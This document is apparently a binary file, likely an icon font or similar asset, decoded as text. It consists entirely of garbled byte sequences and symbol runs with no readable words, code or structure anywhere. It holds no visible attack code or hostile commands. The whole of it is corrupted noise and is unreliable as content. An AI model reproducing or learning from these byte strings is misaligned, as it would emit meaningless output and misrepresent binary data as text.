=��			���� 7i����ox����	"/<j76?676&/&'."7&?6'&7654&/#367&/&'26?6'&'&'&'.>'6?6?6/&#'&'&'&?&#367>/"5'&"'743676'&'."72767647&#3767>&'4/&/&#'4+&"'#&/"&#&#&76373376?67>73#"&#&'6?67676?'&'&'&/&76'437673676767646'&6?6/&/&"5&'.7?67676&"&=4'25&'4#"'76'&/4&'..656'&'&06767727676276?46'7?6767&'6'&3>7/&'4#'636?4#&/&'&�	
'8	
�
VP��3
	4
"J	#C;
%
+�	0
h"
%	


�

,&�
	*,.--$J8-9
))%.-
 +=		 
	
"(�

��
	+z

2
	�&&x$;	**��-@.#>
%&

*&0,
2$	%	J
#>50�-
(	,.&

��		
%#,

H

	


/
		&	
0
	*!"0$
!

*+
#34(o



�	:/	("%'
5.'1
*+
�	*!**+U
*$>0)9=-	
 0Q	�

(���"E��4'&7676763&'&'&26754?6367>'&'&'"'"/&/&'&'&'&'&4767363263&/&'&'&'&74?676767676764?>76767676&'&'&'&7676767676=&'&'&'&767676767676�

		�


r,#&'=0=+-$04)
	



	'%*+(+$0#0!49*��#5> "C	0&
$&#%	 " *	&	"�			#

$6

&	 #�3
4*&	
	
	'+#$'%6;0+,?) *)&#w!,)$?<B1 0

.	:
#"9 GB!&-)�INW|7676267>766?>676?654&>7>7>#!"'&'&7%65.%&'&767676#"'.'5&'.D$<	MI1+32	
'$




	)
!)�Y	
��Y"/\&&:+^Q
	FJ
!�<$

!
"
3$
"+.L
	
�
 !2".7<;+.
8'/82=	/3 �p\_w��.167>&'7>76.676'&7676/'.676&'.67635&'&'.7&'&&'.'&'&741#�_usb8	*tw139�*cY --+A
K,$4&
	#1(42W;���Q1
	',.1B:xDN)�� 			Q�6KY<@=E3
)##$ky�$!
	G*.V4.# ,
	
 +-4(
EI!?4+\Mf�&/"
6D@|-0
-M;T	"


d����$h|�4'.&2676".767>676767&'&'.5&7476&'&#&'".2?6;6326&'&/726'&"2>.?$#yDEz#$%#w�y#&�;d9 f;7]c��!;0)$


	
,5
1
3b$
(L(#
��+D&)FNC((DI=;EF;>�=:EC:=v;d:=2059.0:>307J7%*)	


	!	



+B�i$'.
O+
	�&C*(D((DOE'
�U$F`w������&'&'&'.>767>7>/&&/&'.'&67676?#'&'.65&7>762'5&=6'4'&676'&/'&676'4&&'&/&767676/"76567&&'&6676'&'&'5&'#&'.'&]
.		
�

		<0
*,#

!	(	
- �+)	
�.	
" 	 Q�	
%"~#)0
	"
0&$	
"" ""�!>
$	�#;>1G1�
*

+I?/
 
_
	

'�
(*&&	+�����%"&=32654'32"'&'&'.'&'&'&76'&'76?67&/&'&'.'&676?66'&=&'&'&'&'&77676'&/.7'&'&767676E$4%$?8G	
4">9,64 "	/	$%+7^4.&	
2- 
#!
.1'B/T

!,$$A%7
	?.*77>V
%8 Mg%%

$M##<!9B-35@?%,,!$	#@z,'
7%
		 +".)69&%@T')-"0(#-#$

'#A-e0Ao6[�����!"'&'.'&767>>&'&'&'&676?67>&'&'.'.'&'&"'#.6?676'&'&7676?6332327>'&4>"&s	
	-D


&F#!	l9w*%j-
)$)V8�",Y:uW,
�SZ	 !
1		 /
	

3,8[3.66
7PN,!*%}3*Q(,&"
%'-3k4!H	E
�	
+����"s�����������n���/cp���Jqu������/=J_r{���&'&'76767&'&'36767"'&'5&'&76'.'&&'&/6?'&'&6?&"'&"&'&376766737676756767'&7&77676?676767676'676'&5&77&76=&7>7&'&6767>'&&'&/&"&'&'&'&'1&5&'&/&&'&"4&/&'."&=."&'&"&?6&&'&76&&76?6&&?676&'&'&76'&''4'&'&"676&'67'676?'676767476&'&7>32767&#"#676?26'&/66&/&'6767?67633'&#7676/&''&&''&'&76?#1'767'?>7676'5&76676'&76767&'&632763&'&7"&7&'&7546327"42"&2"562'&46?6'&'&?67754'&'62'#&'&64#'&;2#"&'&'&&''&'&'&/&"&?6767&4?6767&'&#6;273676&'&6"67676767676&'&'&&67667676'&76'&'5476&'47676?76'&'.'&/&&%&65&6'&?6/&76'&#""676?6&"756?6&'"?67"'76767&'54&57&54'&'7475>7676766767&76'#"'&676%26?"'&676/7'&'&6766'&4>&'&71676325&'&..7676'&'#6323?64/&'&77>'&776"&/&'&.676&'&'&'.76/676?6?67766&">6&'&&#&5&'4&#&6767501&'&?32767>?47&76?6?26'&#'&'";21>7>77767'&/&&67676.47632'&'.6'76'&5&67'&"/&&76?6'?6767&'&'6&'&76767763#"'&'&'767676676727'"#'7#..7>76&4?616�


$#55
& (46(#	
	
	
	
#

	

=
		#
8	

%

			

		
		!3$
	
	%$	



#/:&		�
$;/

		
�

		
		 S&& (9A%"	%

	 

	06

 
"%&
'!#



��
	

	
		?	#��

	�'
		


'



 

		



		�
	
�)

	



	

�	!



			
�D*
%*1�
3%8T��C
9"	&4
	�
		�


�
��	k	
9

L!$�
!�
:			HA
	

)@J!
	
	/!$"
")"'	
""



	"

 
	
%!4/0
.!.3
	 +
				
		

		!#!/	4


@=
	9K/	3/�

	)"
		

"'
X#

Qw	



v~
qa%	`�
	!
	
		
	

-	
�


#
		


0/%		
		
'&5"M	 
	&"4, 
^		
	"	
	
	

!	



#			�	


		T	

	





		




�	


	
	�&

	
5
(
0	/	$"	�I'


	
	
	 (		
l 
%
M%
'��	

!
	�I'&'&76376767676?676?676763276?676?62767>/&"3'.'&'&/209/.'&'&7676714&#"'&'&'&#'#'"'&'&/&'&76'.##'&'&/&76'5&>76'&'�
8"	1!	"*	
	
		
	





	
"-
	


'	
�$&		47		

	

2*%

&				

	
	&
			
+
			
$(
	�4d�����+2/&56'546?>&"/.=4"'&'&6'54&#"&'&/&/.?6767676+"&76767'&'&+"&7676&'&'&'.76767676%6'&6%456'4?676"'&'&54'/&=476762'"&'&76?6//&'&'&/&7676&767>"&57+6=i+"8?	O
&J*RHf'dm	0 PJD<X*(2 @ .	kt�~�Xo8M,1Q.
 'H	�	/
�$&=L�8462&1*7<%@
 
 :
1 
M
=	��%H

	
 /':]
.5	>&"'DE"	�<	

'		V
����6?67324'&'&22'&'&/&'.'&'#54767673>'&'&&7676'.'&&3727676+3!2767>3765'7>'&62�
%,#	�	
	:<*%G"B8(+
%3
 $0$/%&M&��( e P�
	�	
  �
+5*6!'	
!'!(
8K#&	 X	H
���js�"#"'&'&"'&/&'#2"?6'.'>76'&'7676&/767'&'&'627>76767676767&"&462%7&'&/F9-&"7	�� K'1	
J 

	

	 ?1-M.-6)<*"��

��b1+7K,!a� _V/>)@2Q4>%J	t
( 				:U/

	f>/3;
?��s-Nl��1:%&/&'&/&'&'&7676767&'&'&74'4&7565'&'&'&76/&'&7676'&'%6'&'&547656'5>676?>676'56.&'.66&/&/&'&"&'&'&/&6576?67676&'&'&76?2764'&'&'&76?6676'&/6'32�4
	
E=		%!
""0!
	

			��	Z=	$�H_/





N*21	0
>'
%

1�
:+/ = 24
z�	*$ +
!�,723(>O-0
.C
�#	6-,  	.,5



	+A
J

Ja1
	&K#	

L*
&.%	

	



�����lt~.'&#"6#"#"'&763225/&/"6#";27632327>?327>?32674?6##"'&?67;2?63232?6#"76?%767632�	'b#	|�$)
5

Z&t-{H$)D
fj�G+s<
T[8(wQ)1,	/3��+K	 r�;_2A�;;v,+FLL"
5H	6Q	&		
(���7'
�|
7!!!'��!������@�s1,t�8pt�k���
3	n�F��!n��l�D�)�����l�t�H3g!76767676326'&'&#"3276764&'&#"!4."327676?"'&'&'&/!7%327>�9,4(!;2'3		"<+2&!/(,7GN86XN8."p��%>I
&P$/�(��'~N0($+� $23'(,")6%#OK0"8ZY?8,��)A$
*
	D4&
^)32G;W_H�t�H2B}%&'&/&/&/&'."3276767327>76%&'&767>2'&'&'676'.".76?6?6?>32�ojAHAsf&E3$+
11:?==02	,$3D�2Q
-6/71J$%&0?b
-HUIa;5#NH0
fr).!v`
�1��! #4��W737X"DC#X70fQ"*!P�&>Ez_**"A%%!&**ayB	?M&
 ��3$$3��1
+�<%'&'&/767%767767
\UQ^%K:/VT^aNʶ6O(`���ʧ�����\�㊲%
o�T& s��-r��h�UN'&'&76767676767676'&'&'&'&76767676�+7o]vL;-(3
A'1'	>NSkIH,:DvS/)#M1	,As��SBgN^ac�q^N20+7lB'
B#!@TZV`I<.OB
'D+?7@bV`03=y*�i�R	!6!�H@*<8a����R�X}e�����Y�0#'&7567676767676'&'&'1&"32716767251#/&'#'&'&'&7676765&7546767673256'.'&'676/&767676?'&'767676?67�Q>EH&3	)#%/;PJsI	 $;GfI 	
, 62		(,
&NX1	#"@(
&2:wx
#
#2"("
-Gp$
%


	
		
 	
(H.

		,A
����K%7>'."&462&/.+!26767&#"#"/&'!#!!2676767#

  :�1F00F1�sF4p 
_��-;< h
����*
9q53 ([#11F01y�Cg3)�i502+$	�n�KW3267&'&!"3!2>='&'#"'.6767667!535#5357>;3#34.�!$(7B�5V7H?��_+I++I+�+H+��QCQSVG40/##J:bMo#�|���b���7D=?-!+IA<OF*
-+H+�`+H++H+=E'R,.Yd*,$>J'F'du'Fs^
+H+�����&EYu�"327>77676/&'&=4'&'&'&'&+67676732#"&54763676754.6?6%32767676.#"'&'&P0N+6 /+F$(0	

 2
	0)+R6C
h!
$P#-W	+ J
	
�fc}��[_bO	V[XV��}l
;	+.@O-*		!
	-�) #+R	
|&+$M��/&"-+�[12/

!#"?
�k�Q
 '&'&5!"'&/!#!4?6767�!O��L7;��^v;�p[x=Q�"!P��99���C��^v;�[y<�v�F*8&'&'&'&'&+;2&'&#"'&547>3!B]:&��-'��
!-]C4:f#"vA)BQ3q!���RxJ%
	��
d*�
3)',
 5[	�Q��g�U5hqz��!2'#"&'&=4&+'"&'&5&74+'.5463%"#"7676767>/&67676?636#%"264&264.&'&=4676.546�'	
 /' #%
"��/(	
>C43(
	C%�w
�

�m'#�)3%4#�x'$
~�A@&�.$8)I	2J#@3;�





���#
�"�BC#"%$����,E^nz������&#&'.76776'56'.'&676'&"75&7466754&'&'&6776'&&'.7>76%0#&325'>&&'.7>775#&'.'&7>76%&764=4567>?26'&7>'.&'&'&>		
"	

%7
�5
!"�
 
8�

	�	
!		
��+
w!	
$
1�N	
&
*SB�+)tT(!ZV!	
NMc	))K!A1�	4
	 ��
^)Z+

	'i

+
�$
(-637337%"276764'&'&"&4623'"264&��g�i�P)(92&!!&d%!!%2)):()�Xj""0""$�|88�����%"K"%%"L"%�*?**>+;�|���"0""0"�h�R
N>7'&76"'.'&"'&'&'&547>7227676761'R&
8&*(7((.
.5+,*.* o? 
(&)(?&3<( *++(C(-'��;&	)=BV]WcH9D
		
8 =O[>2���%	%)DThv=46;#"&&?>7'.7>?3&'&/&'&76"'&6?6&&'&'&'&'&76?6+&/&'32
�i�

�M	
;
;;���h<U[E.*+
+%/�

@$	"			~

	#4
x*�

��

�
��4
X
"-!�"�%ҵ�6�cd0`,N+I?K�
v8		6	�	

! @	
O5
��!%)f�537'%#5#"!%!5!3#73#+'.='5&'&/2+5'!676?653767676='&/2+367676?6=&'&B\>��	c
�4
�77�88_7�
�
�7
		
	
		7`^���
��;	37	7777PIO

R�
	
		
M7
	
���|;DZc32+"&'&=6'4/.'&'&76?>76763264&".'&=47676.46�� 0$�	*"7F#3C"Z)
	`hi6H&5('6&�#-%!4�*(;)*9(|'<5��0(!
Ur9	F"3D!Z
+'"`hh3	Y'&7''��a-#� $ 	Z*(<'(�j�R>fw��67>54'.#"76767654&'&'#"'&'&51476776767676?4'1'&'&'.'"'&'327>7''&'&'&'7676767677676=6''&'&'&'&'&�QCE�B@K8�D�x"�M3Z?eA6'*,P��Y?5?*F<@XP�J{]M7*+U�kEH?:K=.*/84lUNtGG^bl^WT�*)O��*5REZ:G
(/9��wiWB8	G��
	]OUeptMn
'>Ki7GG^K\@I�(,!$K��	 

!&	 -1B4��!,,#+%<;52a1$!T(/2-��BM+-"!xOH4[e6@eBB"#'>$6.-FKL?t�/$.T"*:D2;!&	
&,5���CScjp��&'&'&'&'.'.'&'"?276727672767>6'67676&%&'6&'6760'.67.6'3>&7.'&'.67676�,):<4	
(_*([*+5,&,):<4'_*
'\*+5,&�HH	 #'9/AB��6;%$5II�
�8JJ9;$$"6��B
#'" BHHt=*(	U6<+(	

ULml1BF8	1v1
ml� Y8:Z"Z�ll2v0
�8:Z�
CF
	mk�jOR-������[��R�s�n�������g�S 6Oc7>7676''&'&'&67>6'&'.'&&'&'&767676'&'&'&'&'&7676767';4SLTRAS�?A!,<Ccalpf`HF "�C^Y�Y\Ax=$ 1.
	53�X�c7C
;=M#G#qS
>	
"&9A�U�[OF41
_JLX`^@b_cgJS..+(QOfi�J('%'I��74.2bbXNHc�z1:GaLFD*-iQYOI
##)',*.*-(���
��1:IM`iw!#"'&'&54632&"27!!32+7654+3265&'&'&#3276!!32+764&+3267&'.+3276�6D!*"B-!($F//H%��5��_5	

ER
&"

��6��^6
	
"FS
"
��*�
.= -B-d*-


~>L	AS*-	
~
>M	A�l�Q?/5%�����=�|O���5C���R�������/ANby67#'236'#%6?3+67362#'672'67>322'6?67>322##09L%#!+#GB!O'$' &M/b_/"3%K&*

(B"# *#G�
�
3	'MMi
M'
6  )Tg
	

	M'#*1 )TO^21[ 2$J?22bI31��p;)4"x7W
-,��V*	*9�f�R(>Uhpz6?676767673'&'&/2767676'&'& 47676'&'&'&"276764'.23!"#!&7676+O\y/51A>lN^$Li�+5��r,�pm@BB@nq��pn@BA@mq��@=jm�li<?@?in{jg=>�PDBP('��EC'))'�P?Q���'%?BIt=?fHV
*Te�*1*96hQo!	x_�9:�4B?lp��rn@BB@mq��qm@C�~lj=?@?in�|ji<>?>hk�(&�NRGEQ('CE�ECO��gK`IB@%&�r,9U".#"5."32672>4.".4>2!".4>2'76.'.6?>7\\7 < 5X47\\lY43Z�t66?66766?66�dd	 
VV
	cc	
VV
�8//8���4X38//84YjY4��6?5  5@56?5  5@5��

rr

��
ss�j�RIx�������-5IQs|���7676767>/&'&'&'&&'5&'&5467632&#"3276767'6767656'572?&46766&'&'&'&'&7>=7>=>=>/76.5?>?56767676&4&7676'4&'6'6567676754&&=4&4576=576=5766&76=7>/656%45>/654&7>7'66>&7676=?'"'>"264&"&46274+3533'6'532#Z**FU6�y	%-7?Cr]�=0)|lp�4BHMmaZEBIBBpt�}iVB5T6]d�)+9
h
	&�
+#J
!�))
T67@K5kZ?.	
o��`(-6@��"8C
G

s


#�3.S6"0&�"'	
Iv%;

�-."C

	�&	



	� 	'



��<9K6BDL��>?*(GF�^�tsCF6,M>D-xEJ6'E(
	
	

%":$eJ!
�UV�	����"	6W

	
lW�		N�1%1
	-1)�
�

	B,#^p	[o
	� 
J�	,(	
/	
	-!
�
h	+9
+(%?$��''N-1

�(%7F|��	Z���Rt���2@2327654'&'654'&#'#2"37".=4322'4732+'&57"+"3".=4?24+"33276=4?<27654/.4622=4/&#""&'&4"724#'.'&=4>?24+"2"3?4"'./3257>24+"32#'&'&'&""327327654""&'5432254?'"##"=4322>54750""#'"32#";32674/.4632254754'#&#""&'&54"27627654/.4632254754'#&#""&'&54""'#.'&=4>7624#'"32"3726'7"+"32#&/&'&"#"2724"&5'32657467324'.4632254754'#&#""&'&4"27654"#'.=>?24+"3"37247"+"3"32733276764'&'&#"'&=&=474632""&'57254?4"##"=4322?4754"#'"32#";3267654"'"'&'>4&'&+";"3724#".'&=4;2;24'"'"=4372#


\
3
	
�	 8	2
!	

�
3c +9	
�5/
o"

*

+
"

��"�	
''

9[
*
_2 `	
"�5.
�	

	9

P	
�

U&	&4
g
*	

B	C"

(;	�

	
	
!!!	H!L v	S
9q	+	.H (
		
	

		
	
�	'''
U'	�S''n
L6u7
	
	
	
@!HH!�
"!=x 	+.p	$p	
C7%
��&@Gek������2362+723674&'&#';>&'#"'.7676#7257376&"'&'.'&7>#767'36&""'.=376=3"&%53+32#!546;6'732676.+#533#5476?57332#5&?67	&
F&#
	
 	
#z'4^�,]

*=��!

 -xO:?U
*
��8f6:f 9e46f3� !!
�'+
#
	N
N%

NXMI
IL�$Iy$'D'B@��5IR[h�&#"32767'#"&4632%".#"335462354&3&#"2673'&'&"&462%"264&&/&>7".#"335462354&�'O'(%&#10#+�0;)=	
=��HO(-%
=%
u$22H22
�1:)<	
	=�7060
0F0HE�z		z�
0. �
��3H23G3�oo��z		z�
��9tx��3733'73"'.5&47>76236.'&"2767>5%'#"&476;234'.'&#"+"&5#26767654&73#%&'&"27>4&"'.4>762+M>Z?NH
�.-;X)T
�E	:
*'

3N!:	"E 	
1;;#PN:
-	

	-
��!!�mEE	+	
E
(
	

4
	


G��DDg((�i�U�?6762&'&'&?62&'&/.6'576?'"'&/&'.76'56?6?&&'%&'6?67676'&'%&'&'&�>� "/#E�gM�-X,�$,�%@%	(��
1T/%F�
	&6_6/^�:'MO&>?|26

Lp9:A`0$,�&%��
.(L�$"')BA�]
��5/I�M�	3�7qT%
@�%%�,#y�#�� ";��,-'Q~1 AB0d(-
	=[-6P'.$|
�'"@~5�N�
)<z@���{�A�76767>76?6'&'&'.'&'&'&'&767676766=676762'&76767676.'./&>1�
'6.@u�
	
	)'W(/!0
gF(	#+CZV0
-$*#1"I##$

K:C6.52%-G�# .& 8
6%1(

));U<L:!")Lm�	#'/6&#-$	'12-#	�WK#$%./("$1&	'"
������Il�����&'&/&''.76767'&/&'&67672733767>7?67'776764/&''67&/&'&6?64.&'&/'7'7676763>'.%6767''&676&'&'&67z	D0%M&�		"GQ 
=G<-2h� !!$
sM&	
0< /</	

!�<	

"'O$�
 
	
;�O@3
0;./</($F�3��</;/)I0(4&W 
-�FD1'L&�&)N)
- �.4f� .&C�KM'	



0< /</	
&��<	
&(O#� 
;�P
1
/<.0</
!$
/
</;/6+x!	
K8		��!.;EQ^m4&25%76=44#&325%&2656'4!656'4&"2=4&."767%656'.454'&767++���
	�
�
�*l

�	
�		���^U+
�k23{
e32g
54
cd
R

-
D.
	
,
			��6:J27'&#"32?'"&4673#%"&=35#5#3?3#>23'."3�5,.:S+K> ;K+S:.-jFF�RRUSSPEE2R"eRR�T0y�x0^8���7^j.7C;^.N6D8-IpHG�rC�K|+QK�.9MK�r�1441OZZO�j�S37So��" 7676'&'&5&76#'4&76=3"'&#3#54&#535#537>721375476+6=3"'&"'81#&'33#;#"'4&3�tqCDDCqttqCDDCqt��A/ 0A�##�OGD

	Af0A0..�>RDCqt��tqCDDCqttqCD���!"
�

%#"�8�P��$�#

.��!"OM

%#!
.*K#�#�

5�Lc�=67676363#";27654636756547>67653'&/'&/+"'&'&'%3353'&/&'.'&'&'&+"'&'&7676;#&;26=676?335476?+e!2R@#19+5�Xi
fZ
;>&#b)$%b!�*%6$F	�	];
�
�		�% E$ AS$; # H	>2Y0$_;2GW?#

��

��	
x�~	%!
"��
+
�u
$
 ;b�
�����6
		��
IE>6;075	�(
5j�	4
����z~�Rj~�C\!3Q%&#&#"&'&'&'&/&/&676?>76?6767632?6/./"376?63267362&'&7#3%'327676767&576?#&/#""&5&?6767676?67>76?63?6574'&#&#6?656'&'&#32?>?3327676726?6?6736?6767>7#"'4&5767677&/&5&762&54?6?6?6?676372674/&/&#?6?6?6"'&/&76?6?676?67>7676332?>?6?6=27&'&'&/&'&/&76767676?'&5&76?6767676#"5?#.#"#'.74?67676?2#6767676'&"6?>/&'&"27>76?676?32?7>73327676767'#'&>?37/&76?6.4?676?6?6a""#		!		

"	
#		"��
!

2	4!

%		

		
		
		
�

�

��
			

			

	

!


N
		��,

		
	
			

		
��
	�		�
5&

	
('	


�M 	
�
	Y*	
!
		
"*
	
	" 	
			
%
C			




			
		,

�



	
	
�#K

			

		
				
	
#
B

���~?C276.'&54&#"32&'&'.#'"'.'&74>763�2u;3W3S1�ʝh��/!$/0>K$3
��&M[4Z8A�@;,*,9S�'--(p7i�'"@%D5%F
]K��8Y2�jmR,0Ip{���������DKPW^qvx|�'"47327>54'&'&"'&54762177'4567162&'&754'&"632'"3327676323./#"5476;6276457&#"3276322&54"'.54327"327&75##"'&5374'&#676326?&/%425.'63'&5.'&65&''&6&'&'#./&#&'&'&'&7&7""7'#"#'013.'&'.'7.'&5'&'&'&'7.51&'.'&'3'7&74?6767'67664'6767676"767676767"?'.5#&>&'&76767636&7&7676'65&7670&.'767467=&'&#"562.=67632632&67#"67'6"67&'&'&#7'.774013'6&Ho1
5".		�	
DE

	&	
��B

	 &
q*('	
 U

	7l�
		 
	
	

	

g;)


	


	

	
	G!	
A,27,'
&)'(!
	���		


	��
�ie�	
38&��
��;-9O
(
"�+ F�t		-*	
B;	 !����	!W9@��

;4f&/,

"G	�	�	(
	"!


	#.7
EE@_
	
		
$



&)'!		
9$3

	/	
	

	v
	�sa	
#_		 1%#"
� !8	m	
"	yu~�j�R2.'&#"327>7654#!47>763!�]yFHMe^BqQ']xGEPe^BqQePhyE�P"Pi=:F�!BqR']xGJKe^BqQ']xGJKe��:bE'�YO:aG�PY��(55#35%#'7''7''&'&'&+327676?735##532�h���h��7��;�
��	���U��
	!��Z�[^Y&\Z*`

��\tpZm#
�jsR%3	3'333'5#7#3353�&���ҭ$�n�{�z��{�y�p�!d��X�8Ȍ���I����j�R	1FS`js|��������5#&'&'53676#5.%"'&'&4767624'&'&"27676".4>274."2>6767#"264&"264&"264&"264&'"264&"264&"264&%"264&7"264&"264&;fCEa,)�sB@a0+maA?v9^�<;dg�gd;<<;dg�gd;<,65Z]�]Z5665Z]�]Z56�r7\77\n\66\f*HVH**HVH*Qj?Fa*-D(�%%4$$L��
U!	�cC%X	



XbCFjA,)bDAo@-(��|A?aczygd;==;dg�gd;==;dgym]Z5775Z]�]Z5674[]^7\n]77]n]6�+H++HVH**H�b>Dx=/3&((}%4%%4%���L!"eY�%%��



���/ft���	@^iv�&'&#376'&>76'"'&75463>&'&'&'#&'&'&'&"'7672767676'&&'&'&67632%./47>765&#2767767>'6767>3%&?656'&'&>&'&#'&676?>'.7>'./&7676767&/&'&'7676&726676'&/&'&'6&'&#&'">727676'&7677'&?676&'76762>'&'&*'&763276&'&'&"#7676'O2CHH	
aV6!.9)%*N
%;	B� ,E		
0	
��
�(&+		
	-*7%'f
				

�
$
	l	X'F


	
"#	�)
&%,(++		"


$'�0<	

. E;4
.6
X/
,=		
	
.
&



	'			 
:
	

	
�
				�i�S(E���"6E4&'&'&#"6?676767676?3''&'&'&6767%&>67676?6?65&'&7'6'4'&'.'&'&7&'&'&'.67&'&'.32476'./&>6?67676767>7>%7.'77.?&#767654/&'&'&/&/7>'&'>76'&'&'&2766.'&676�3/x<dPj�P/o;v		H�H7(*�1bP(|�!&Do�V(�=G?6 
%)	*D$>

	
!/
$��#F#�	
&6��"

 :a%
&,<\44s)\T2>i&�09
2��f:f=!?D&N( (3IS:tW�]���E4,AQC��!
 ��
!%-,		R6/W	%	,J
 $
)"T
)!

$	%#


#$' -
$.4
$,M#'3-(	)	>C^
	�85
A)9+3!
S0
	:$H)*A 
5= 5'���^BK&76&'&'&'1#&'&'&/67676?6767."&462F"

"%0-2#73M(:+710!4F*U/9>3>0*	*T��Q�>
##+#K�
(S	#



EAf=9$#2$: J��r!j���.'&'267654'&'&'&476?6?6?6?6?6?6?652"'&'&67632276761'6767672;2&/&'&"'&7&'&'&'.#"'&'&74>227>7632�U>

 "7"-74�ʮ25U,>�


$	

�.,J	�	
%	�		
$0*#&&@L()<
q'
L)


/>RbjYTc]SWl�j7(�
		
		

	
		

�6	
G	
	



6 ;%
*
 ���'x����456'5&'&'&'#37676763#"654'.#"5#&'&#"32767676?##"'&'&/3737326772673%67676762"'&'&/76767>&#&'&'&767673%'#3�/5

#:'37 
	2 EP % 5	�1	-@	!*!,.�K2
�8	�
	F/VU;u-8�'


!%~�)*4(
				
D
	/*.�




i














ī��T0�j�R!+7HL`lr!367676#35#35#535#535#!#37#'>7675#535#535#375#35>354&!+#5#"&5463!235#535#535#347#�'�/(2-��*K!�K!!!!K&%6 Z�+!!��!!!!KK�))(�1Ģ
��
I���K!!!!K���
��)#!�����ZmB�?���~ (�^`q
&��%%������Ll��Yg���7Dk{���"+v�764&/#764&/32?676=4'&/76=76'.'&/'&'&+"1'&7>#"'76?+>32676=4'&'&/+';26?676=4'&/+&'&=4'&/#767676=46?67'';3?676=7>?767>&#"&/+54>765##"&=4'&+'&/>"3276?5'&'&/67676.56767654&#"76763232673'&'&'01#"&547676?33'&'&=325#4'&/.54325'&'&#"#"'&/326#"'&'53'&'&+=&'32'&'&'&+3276=%65'.#".+3"'&=67'"264&54'&#"."'&'&+3'&=676323'&'&=6323'&'&754'&+3'&'&�	9	N	
			$Xg&
G�1"'		U!�

-�
!�


(

	
	
�R	�%


�	
($	

	p	(
!�		



"��-%	

`_		�

(b

<
()
)F
(Y	
		\		
	'	
3
��
'<
.�G#4

/'
6q
	)
s>8_		$	;
	
		
,
P��@+	
6


RU


8b		j
jf




		D		
	v
	e	[
	
KR

�R
	[
	
Q
K
	Q
K	X[��3HVfktx676767!267#'"'&'&532#'#57>37#+?4;#%#73#'76?362%#7673+3#73 t
��(/�"%L?!Cz����R�
+�?N'��	�		SN�RS�		o
		!8j& >�S$		E"#E�JL���G&Fn��������4g{����07F�%53765&#53"3#572=6/4&362#'.#'&/276'.6%23674'#53674/53#&'#/4#/32'"&/4#3#52657<&#2>&'3"3'#576=4&#!6?3#57'##576?6'3'%3'#57'##576?6567%7"'7232+576'533267>'&'&#"'5'6?#53&/&+"'73'&'236763&75'537&"#'#"5"'576=&/23#56764=&'6?3'#5&##5675'"#'637#5&+*>73#7&+;26;#"'.'&4676732'&'5#536=4&+%7'5&'6#'6706756'56.'546?3'7.'7'7#%67354&+"'.76?373234'4'&'546?67#&'&7#<'4'.'5436�i
		��	c	i
6

�u

dZ4 �33
^ 8L%�	z0
: �
;+!4+�
�
%+GX:
	�r


KH!	�gHTfF
	I	!!
J	��p"
	1��	

	
	
			O]4"
]R		
	

�	
G"01nm >ba

!
�	=
/E

	Fx!!-
�		e�
�	
h
F��%CNl������5#"&'7>'.#";54&'246775#"1"&=324+5##";;5476=#"372"&=324+5##";;54&'#";2#;2767;54'&#"546?67'"35'.5&67324+"+"32547#";2#317;54'&"546?67%&'&'&/.'&#?6?67676?6#&'&547676j.H
#":1
;�
	
&
�	

u.*				
			o�&22	'
2@-N.*	
				&	# .


Y



"!	V
	t}k	J!O	
w	u	J!Ok	R
P

`��Y
';	
R
m

Y			
4

	
�K;X��+"=33'7##546;236?+'737#"=75##33267'74632?67.#"#"'&/327654'&'&'&%'&'&'&54?5'#"/327676?>?5J% 	r �N	N�a
�"IM			,$'p*'
!
(#
r3
	D6		%) 1	
Pr

AB	�-"	
��
lR4�"L

�!
�&"

$	$4#<-4&3.	
TkD&*4�����+676&'&6767676767>&7�w	"(cr/\PI>?"BP*4��4YOY1(	.1FQY!/;={=��%D9s2SJGC& ?!FU'0" .'M>�7;("
	
!�&	�� )<Brx�535#535#357#'#373'"264&"&462'164&+35323.'#532%1&#".#"5#535#3533267##"&532733#>2"&462LUUU���L%%PLLN$%PL�

��!,		/#,PW�GG7*!/<|0B>?���#59&<��<n))UU**U:&�$"#&;��q
*5	"1�

G%'�o\MEk�	"-7@LYgt~�������25%76=%305767676767676767676?676'&'&/.'&'&'&'&/36"/46?>?'4"1&=&7676?>&#+"'5'&/./&/&'&?27'"/&'"4332='&/&/&'5&2327265754&/&/&'#&6373632;5#/&'&/#'"?225135"#'&/&/#/&4;6/&/4337/5'&/&'.63752&#'.5'4/./432./&'&/&63750#'#"51'&/#&/&4376354/&/.;6;41#&/./#./#50#&?6.#'&/&/"#&/&##/"#0"325#"362361"732"3?2"326?2732'#'&/&'#&"676&?65>?6?673'&/&/#6?6&'&='.'4&/4716;13/&'&/##'"#"#&>?626366?64/47676?627>&>7>7676?>'5&/&'&?676?>3454?>4?6275&6?>?65/464&46576/?67654/&57676?4&'"/063'5"/50?0'"/0?/&'7632'/"/07363/507"/76;'5+"'76;2'6;0'"/50&=?20#'4?27"51767>6'76'2"5'&#'"4346?/&#'"'"5?6?6##"5?67>7"47676�e����o�o����	#*"(

+)5(
2\(3&2&+
3
�_�v

	

			

		

		 	
	
	

"



	


�|)	7CED,�>AA }

.GCV:-&
&;H$++)B*H&;'7>�b')

(&4 Vj#/1#�NO][?		



		



		

	

			
	 	
"
				
	


		


				
	
				

d6
,#
'(0
&:			

3
�o�M)7ESet�����"264&"264&"7>4&'&&267>&"2654&'&7"264&'"327>54&"32654&'&7"2764'.!"26764'.'"32>54'."3267654&'&'"27>4&'&�

:--
 -,:


'
(!
*:-
�

 -,


--
-
�
 
�w



+



� 

+:+�+:,�8

�

=+
	>)�[
8,+
�

+:,�


+�Y+:
+
�:

8
�

-
�Y
9

�


�<".4>2".4>2�<fxf<<fye<,<fxf<<fxf<^<f<<fxf<<e=<f<<fxf<<f	��>Rc���%<;?'4'5##35"&'.'.3235#"+&67&#"332767>&'&47632%.'&'&546175'&'&"'&'.#7>'&#"27>&"'.'&'&7354'&#+7>32%&##5#335'.=76767>'&'&"57"#"76765&'".7576;\���$'
!B�
$0
�
%%

	k	*

��)	i
		�
 
,!7�	T- 	6S`FV	dq
)0:-#	
	

.	


''s $

+71;(X	')%**�	35'_	#
�f[RBq6?6763672676?6'&#&'&'&7>6736767676?676'&'&/'#'6;72&&.55&>D`
l		>C !� 
��
5��u
:"l		%�&*	$�
Z��wPv
	
	=	$			s$	J��K	,�-	 1/$	��&*BFRfs�3'35#535#%&'&/#3676?#73%#3676?5&'&'#73'#'#377'735#535#%#35375&'&'7#35375&'&'.HJPS		C
	N
	)=<�C
		M
	

=<�24//54/-

	PPQP�j+7+

�j+7+	
d@+

	/		8	/		/
S8;:9	4"	
vUTO
vUTO
